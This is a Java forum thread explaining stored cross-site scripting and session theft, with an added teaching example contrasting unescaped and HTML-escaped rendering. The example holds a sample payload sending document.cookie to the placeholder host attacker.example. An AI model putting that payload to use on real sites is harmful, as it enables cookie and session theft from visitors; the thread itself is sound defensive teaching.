JavaRanch » Java Forums » Engineering » Security
cross site scripting

David Spades (Ranch Hand):
I've been googling about cross site scripting. For now, I understand that it's a form of injecting a malicious script into some input field, which will then be saved into a database. Can anybody show me why this is harmful? Let's say I'm opening a personal information screen to apply for membership on an online shopping website. I type some malicious script into the first name field and submit the form. The first name field will then be persisted to the website's database, so where's the harm? I'm still not following. Can anybody please enlighten me on this issue? Thanks
Ulf Dittmer (Marshal):
The harm is not in that script being stored on the server; the harm is in that script being executed when you call up a page that executes it (in your example, that would be a page displaying your first name). But this is a big subject, and many treatises have been written about it; the Security FAQ (http://www.coderanch.com/how-to/java/SecurityFaq#web-apps) points to a couple of them that discuss XSS at length.
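To make the point above concrete, here is an added example (not code from the thread or from CodeRanch) of the whole stored-XSS round trip in miniature: the value typed into the "first name" field sits harmlessly in a database row, and the damage happens only when a page writes that row into HTML without encoding it. The in-memory Map, the user id 42, the payload string and the host attacker.example are all constructed for the example; in a real deployment the victim is whoever views the page that displays the name (the member, or a staff member reviewing applications), and the script runs with that person's cookies and permissions on the shop's origin.

```javascript
// Added example (not from the thread): a stored XSS in miniature.
// The "database" is an in-memory Map; the harm appears only when a page
// renders the stored value into HTML without encoding it.

// Encode the five characters that let text break out of an HTML text node.
// (Correct for element content; attribute, URL and JavaScript contexts need
// their own encoders.)
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Constructed sample input: what the attacker types into the "first name" field.
// attacker.example is a placeholder host.
const MALICIOUS_FIRST_NAME =
  '<script>new Image().src="https://attacker.example/c?"+document.cookie</script>';

// Storing the value is harmless in itself: it is just a string in a column.
const db = new Map();
function saveProfile(userId, firstName) {
  db.set(userId, { firstName });
}

// Vulnerable: concatenates the stored value straight into the page.
// Whoever views this page has the script run in their browser, on the
// shop's origin, with access to their cookies and session.
function renderProfileUnsafe(userId) {
  const { firstName } = db.get(userId);
  return `<h1>Welcome, ${firstName}!</h1>`;
}

// Fixed: encode untrusted data at the point where it is written into HTML.
// The browser now shows the literal text "<script>..." instead of running it.
function renderProfileSafe(userId) {
  const { firstName } = db.get(userId);
  return `<h1>Welcome, ${escapeHtml(firstName)}!</h1>`;
}

// Crude stand-in for the browser's parser: is there a live <script> tag in the output?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

saveProfile(42, MALICIOUS_FIRST_NAME);
console.log('unsafe:', renderProfileUnsafe(42));
console.log('safe:  ', renderProfileSafe(42));
```

In a JSP the same fix is to write the value with `<c:out value="${firstName}"/>` (which escapes XML by default) or `fn:escapeXml` rather than `${firstName}` inline; the principle is the same in any template language: encode for the output context at the moment untrusted data meets the page, not when it is stored.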
David Spades (Ranch Hand):
I just found out that cross site scripting can be used to steal your session. How does this work? Does the hacker need to have access to the victim's computer in order for this to work? Thanks
Jeanne Boyarsky (author & internet detective, Marshal):
David,
An XSS attack can send your session cookie to the hacker. See this OWASP page for other ways a hacker could steal your session cookie. And the attacker does not need access to the victim's computer for this to work.